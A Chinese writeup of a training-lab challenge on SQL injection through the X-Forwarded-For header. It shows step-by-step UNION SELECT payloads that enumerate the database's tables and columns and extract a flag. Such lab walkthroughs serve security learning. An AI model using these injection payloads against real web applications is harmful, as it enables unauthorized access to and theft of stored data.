墨者学院-在线靶场-HTTP头注入漏洞测试(X-Forwarded-for) Writeup

其他 2020-01-22 10:37:25 阅读次数: 0

首先题目提示

XFF注入,大致思路为Burp抓包添加XFF请求头进行注入。
启动靶场
点击进入墨者的任性网页

Burpsuite抓包,放进Repeater

先GO一下
在这里插入图片描述
在请求头中添加X-Forwarded-For
试了试 'and 1=1and 1=2都没反应
当改为or 1=1时,提示语法错误
在这里插入图片描述
在这里插入图片描述
继续,union注入步骤

order by 5显示未知字段,order by 4返回正常

得到数据库中的字段数

在这里插入图片描述
在这里插入图片描述

union select 1,2,3,4

看看有哪些回显点,发现多了一行商品,名称,价格,数量分别为2,3,4
在这里插入图片描述
在这里插入图片描述
爆数据库版本和数据库名

union select 1,2,version(),database()

在这里插入图片描述
在这里插入图片描述

union select 1,2,(select table_name from information_schema.tables where table_schema = 'pentesterlab' limit 0,1),database()

第一个表名为comment

union select 1,2,(select table_name from information_schema.tables where table_schema = 'pentesterlab' limit 1,1),database()

在这里插入图片描述
在这里插入图片描述
第二个表名为flag,应该是这个表了。

继续

union select 1,2,(select column_name from information_schema.columns where table_name = 'flag' limit 0,1),database()

第一个字段名为id,再试试第二个

union select 1,2,(select column_name from information_schema.columns where table_name = 'flag' limit 1,1),database()

在这里插入图片描述
flag应该就在这个字段中

union select 1,2,(select flag from pentesterlab.flag limit 0,1),database()

得到flag
在这里插入图片描述
回到最初页面,验证flag,得到key。
在这里插入图片描述
在这里插入图片描述

s0mor
发布了27 篇原创文章 · 获赞 2 · 访问量 3919
私信 关注

猜你喜欢

转载自blog.csdn.net/s0mor/article/details/98964748
今日推荐
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
GCC 14.1 发布
面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」
开源日报 | 谷歌扶持鸿蒙上位;开源Rabbit R1;Docker加持的安卓手机;微软的焦虑和野心;海尔电器把开放平台关了
中国码农的“35岁魔咒”
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
周排行
Java自定义时间格式
同步整形电路
在开发中最最最常用的字符串的属性大集合
Linux 查看端口占用并杀掉
Java基础四:ArrayList
多线程之死锁就是这么简单
mysql 基础命令集
awk 命令详解
Centos6.3编译安装nginx+php步骤
OCR (Optical Character Recognition,光学字符识别)
每日归档
更多
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022